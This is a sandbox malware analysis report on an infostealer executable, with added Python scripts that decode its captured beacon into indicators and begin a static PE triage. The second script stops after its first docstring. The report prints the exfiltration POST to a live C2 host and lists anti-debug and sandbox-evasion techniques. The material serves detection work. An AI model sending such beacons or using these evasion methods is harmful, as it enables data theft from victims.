Windows Analysis Report
5Jat5RkD3a.exe

Overview

General Information

Sample name: 5Jat5RkD3a.exe (renamed because the original name is a hash value)
Original sample name: 8c39c06251f42e3b7ebc710fe06753aa.exe
Analysis ID: 1578893
MD5: 8c39c06251f42e3b7ebc710fe06753aa
SHA1: cee1dc7963d47a34b22683f42fcd125478a0d586
SHA256: 68d042b3b794b314a80918bf399bafbace6cff82e4d567f9b42f3699d3c44c35
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 5Jat5RkD3a.exe (PID: 7928, cmdline: "C:\Users\user\Desktop\5Jat5RkD3a.exe", MD5: 8C39C06251F42E3B7EBC710FE06753AA)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: 5Jat5RkD3a.exe | Avira: detected
Source: 5Jat5RkD3a.exe | Virustotal: Detection: 49%
Source: 5Jat5RkD3a.exe | ReversingLabs: Detection: 52%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 5Jat5RkD3a.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: -----BEGIN PUBLIC KEY----- (0_2_0029DCF0)
Source: 5Jat5RkD3a.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: mov dword ptr [ebp+04h], 424D53FFh (0_2_002DA5B0); 424D53FFh stored little-endian is the byte sequence FF 53 4D 42, the SMB1 protocol identifier "\xFFSMB"
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh (0_2_002DA7F0)
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: mov dword ptr [edi+04h], 424D53FFh (0_2_002DA7F0)
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: mov dword ptr [esi+04h], 424D53FFh (0_2_002DA7F0)
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh (0_2_002DB560)
Source: 5Jat5RkD3a.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: 0_2_0027255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: 0_2_002729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 Host: httpbin.org Accept: */*
Source: global traffic | HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1 Host: home.twentytk20ht.top Accept: */* Content-Type: application/json Content-Length: 504728 Data Raw (truncated): 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 37 39 39 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2 Data Ascii (truncated): { "ip": "8.46.123.189", "current_time": "1734707993", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name
Source: global traffic | HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1 Host: home.twentytk20ht.top Accept: */* Content-Type: application/json Content-Length: 143 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox View | IP Address: 34.226.108.155
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (6 occurrences)
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: 0_2_0033A8C0 recvfrom
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.twentytk20ht.top
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.css
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.jpg
Source: 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850
Source: 5Jat5RkD3a.exe, 00000000.00000003.1538377629.0000000001766000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
Source: 5Jat5RkD3a.exe, 00000000.00000002.1560049226.000000000176A000.00000004.00000020.00020000.00000000.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1538377629.0000000001766000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3
Source: 5Jat5RkD3a.exe, 00000000.00000002.1560405942.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1538068178.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1537557313.00000000017D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY
Source: 5Jat5RkD3a.exe, 00000000.00000002.1560049226.000000000176A000.00000004.00000020.00020000.00000000.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1538377629.0000000001766000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850se
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 5Jat5RkD3a.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: 5Jat5RkD3a.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: 5Jat5RkD3a.exe, 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 5Jat5RkD3a.exe | String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
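
Worked example, added here and not part of the Joe Sandbox report: a Python script that turns the captured beacon above into indicators the way an analyst writing a detection would. It decodes the hex dump back into the JSON fingerprint, repairs the truncation (the sandbox logs only the first bytes of a 504728-byte body, so `json.loads` fails on the raw text), and lifts the C2 host, URL and the absent User-Agent from the request head. The request head and the body bytes are copied from this report, with the body cut at the second process entry. Assumptions the report does not state: the `http://` scheme follows the C2 strings found in memory (listed above), `current_time` is read as a Unix epoch value, and the `ip` field is taken to be the answer to the preceding GET /ip to httpbin.org.

```python
import json
from datetime import datetime, timezone

# Request head and the first body bytes as the report prints them. The sandbox truncates the
# dump; Content-Length says the real body was 504728 bytes. No User-Agent header is present.
REQUEST_HEAD = (
    "POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1\r\n"
    "Host: home.twentytk20ht.top\r\nAccept: */*\r\n"
    "Content-Type: application/json\r\nContent-Length: 504728\r\n\r\n"
)
BODY_HEX = (  # copied from the report's Data Raw field, cut at the second process entry
    "7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f "
    "74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 37 39 39 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 "
    "6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 "
    "5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c "
    "20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 "
    "22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f "
    "6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 "
    "33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 "
    "73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 "
    "6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65"
)


def parse_request_head(head: str) -> dict:
    """Split a raw HTTP request head into method, path and lower-cased headers."""
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ")
    headers = {}
    for line in lines[1:]:
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def request_iocs(head: str) -> dict:
    """Network indicators to lift from the request head."""
    req = parse_request_head(head)
    h = req["headers"]
    return {
        "method": req["method"],
        "host": h.get("host"),
        "url": f"http://{h.get('host')}{req['path']}",  # plain http://, as in the report's memory strings
        "user_agent": h.get("user-agent"),               # None here: a detection hook on its own
        "content_length": int(h.get("content-length", "0")),
    }


def repair_truncated_json(text: str) -> dict:
    """Parse a JSON object whose tail was cut off: scan outside string literals, cut back to the
    last closed object or array, and append the closers for the brackets still open."""
    stack, in_str, esc = [], False, False
    cut, open_at_cut = 0, []
    for i, ch in enumerate(text):
        if in_str:
            if esc:
                esc = False
            elif ch == "\\":
                esc = True
            elif ch == '"':
                in_str = False
        elif ch == '"':
            in_str = True
        elif ch in "{[":
            stack.append(ch)
        elif ch in "}]" and stack:
            stack.pop()
            cut, open_at_cut = i + 1, list(stack)
    closers = "".join("}" if c == "{" else "]" for c in reversed(open_at_cut))
    return json.loads(text[:cut] + closers)


def parse_beacon(body_hex: str) -> dict:
    """Hex dump -> bytes -> JSON, tolerating the sandbox's truncation of the body."""
    text = bytes.fromhex(body_hex).decode("utf-8", errors="replace")
    try:
        return json.loads(text)
    except json.JSONDecodeError:
        return repair_truncated_json(text)


def beacon_time_utc(beacon: dict) -> str:
    """current_time read as a Unix epoch value (an assumption; the report does not say)."""
    ts = datetime.fromtimestamp(int(beacon["current_time"]), tz=timezone.utc)
    return ts.strftime("%Y-%m-%dT%H:%M:%SZ")


if __name__ == "__main__":
    print(request_iocs(REQUEST_HEAD))
    beacon = parse_beacon(BODY_HEX)
    print(beacon_time_utc(beacon), {k: v for k, v in beacon.items() if k != "processes"})
    print([p["name"] for p in beacon["processes"]])
```

The repair is generic rather than tied to this sample: it scans the text outside string literals, cuts back to the last closed object or array and appends the closers for the brackets still open, so a process list cut mid-entry still parses, as does the `"C:\\"` escape in the drive name. Anything after the last closed bracket is dropped rather than guessed, which is the right failure mode for evidence.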

System Summary

Source: 5Jat5RkD3a.exe | Static PE information: section name: "" (blank)
Source: 5Jat5RkD3a.exe | Static PE information: section name: .idata
Source: 5Jat5RkD3a.exe | Static PE information: section name: "" (blank)
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code functions: 0_2_002805B0, 0_2_00286FA0, 0_2_002AF100, 0_2_0033B180, 0_2_005FE030, 0_2_003400E0, 0_2_002D6210, 0_2_0033C320, 0_2_00340420, 0_2_005C4410, 0_2_0027E620, 0_2_0033C770, 0_2_005D6730, 0_2_002DA7F0, 0_2_005F4780, 0_2_0032C900, 0_2_0027A960, 0_2_00284940, 0_2_00446AC0, 0_2_0052AAC0, 0_2_00404B60, 0_2_0052AB2C, 0_2_0027CBB0, 0_2_005E8BF0, 0_2_005FCC70, 0_2_005F4D40, 0_2_00430D80, 0_2_005ECD80, 0_2_0058AE30, 0_2_00294F70, 0_2_0033EF90, 0_2_00338F90, 0_2_005C2F90, 0_2_002810E6, 0_2_005DD430, 0_2_005E35B0, 0_2_00601780, 0_2_00329880, 0_2_005C9920, 0_2_005F3A70, 0_2_005E1BD0, 0_2_002B1BE0, 0_2_005D7CC0, 0_2_00529C80, 0_2_00285DB0, 0_2_00295EB0, 0_2_00283ED0, 0_2_005F9FE0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: String function: 0028CD40 appears 80 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: String function: 00427220 appears 103 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: String function: 002B50A0 appears 101 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: String function: 0027CAA0 appears 64 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: String function: 0044CBC0 appears 104 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: String function: 002771E0 appears 47 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: String function: 0027C960 appears 37 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: String function: 002B5340 appears 50 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: String function: 003544A0 appears 76 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: String function: 002773F0 appears 114 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: String function: 002B4F40 appears 346 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: String function: 002B4FD0 appears 290 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: String function: 002775A0 appears 706 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: String function: 0028CCD0 appears 54 times
Source: 5Jat5RkD3a.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 5Jat5RkD3a.exe | Static PE information: Section: pvfmcbmp ZLIB complexity 0.9944063789851978
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | File read: C:\Windows\System32\drivers\etc\hosts (3 times)
Source: 5Jat5RkD3a.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 5Jat5RkD3a.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Section loaded: kernel.appcore.dll
Source: 5Jat5RkD3a.exe | Static file information: File size 4449280 > 1048576
Source: 5Jat5RkD3a.exe | Static PE information: Raw size of "" (blank-named section) is bigger than: 0x100000 < 0x283400
Source: 5Jat5RkD3a.exe | Static PE information: Raw size of pvfmcbmp is bigger than: 0x100000 < 0x1b7200

Data Obfuscation

Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Unpacked PE file: 0.2.5Jat5RkD3a.exe.270000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pvfmcbmp:EW;qfezismy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pvfmcbmp:EW;qfezismy:EW;.taggant:EW; (the blank-named first section is EW in one listing and ER in the other, i.e. its section rights changed)
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: 5Jat5RkD3a.exe | Static PE information: real checksum: 0x44aba3 should be: 0x43fa26
Source: 5Jat5RkD3a.exe | Static PE information: section name: "" (blank)
Source: 5Jat5RkD3a.exe | Static PE information: section name: .idata
Source: 5Jat5RkD3a.exe | Static PE information: section name: "" (blank)
Source: 5Jat5RkD3a.exe | Static PE information: section name: pvfmcbmp
Source: 5Jat5RkD3a.exe | Static PE information: section name: qfezismy
Source: 5Jat5RkD3a.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: 0_3_017D7351 push eax; iretd (0_3_017D739D)
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: 0_3_017D7340 push eax; retf (0_3_017D7341)
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: 0_3_017DCBE2 push eax; iretd (0_3_017DCC01)
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: 0_3_017DCA60 pushfd ; iretd (0_3_017DCA61)
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: 0_3_017DAC10 push edx; ret (0_3_017DAC11)
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: 0_3_017DCC02 push esp; iretd (0_3_017DCC21)
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: 0_3_017DCCE2 pushad ; iretd (0_3_017DCD81)
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: 0_3_017E6AD5 push es; iretd (0_3_017E6AD7)
Source: 5Jat5RkD3a.exe | Static PE information: section name: pvfmcbmp entropy: 7.95605426603415
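
Added example, not part of the report or of Joe Sandbox: a static triage pass in plain Python (no third-party PE library) that reproduces the checks behind the signatures above: a stored CheckSum that does not match the recomputed one, an entry point outside the standard code sections, and sections that are high-entropy, non-standard in name, or both writable and executable. The sample itself is not on this page, so the script builds a small constructed PE32 with an ordinary `.text` section and a second section named `pvfmcbmp`, after the report, that owns the entry point; its layout, entry RVA and contents are invented for the demonstration. The checksum routine follows the CheckSumMappedFile algorithm (one's-complement sum over 32-bit words, skipping the field itself, folded to 16 bits, plus the file length). Caveat: the Windows loader does not verify the CheckSum for ordinary user-mode executables and many benign builds leave it zero or stale, so the mismatch only adds weight next to the entropy, permission and entry-point findings.

```python
import math
import struct

PERM_BITS = (("E", 0x20000000), ("R", 0x40000000), ("W", 0x80000000))  # IMAGE_SCN_MEM_EXECUTE/READ/WRITE
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc", ".reloc", ".bss", ".tls", ".pdata", "CODE", "DATA"}
CODE_SECTIONS = {".text", "CODE"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 means every byte value is equally frequent (packed or encrypted data)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts if c)


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """CheckSum as CheckSumMappedFile computes it: one's-complement sum of 32-bit words skipping the field itself."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def triage(data: bytes) -> dict:
    """Header checks behind the report's checksum, entry-point and section signatures."""
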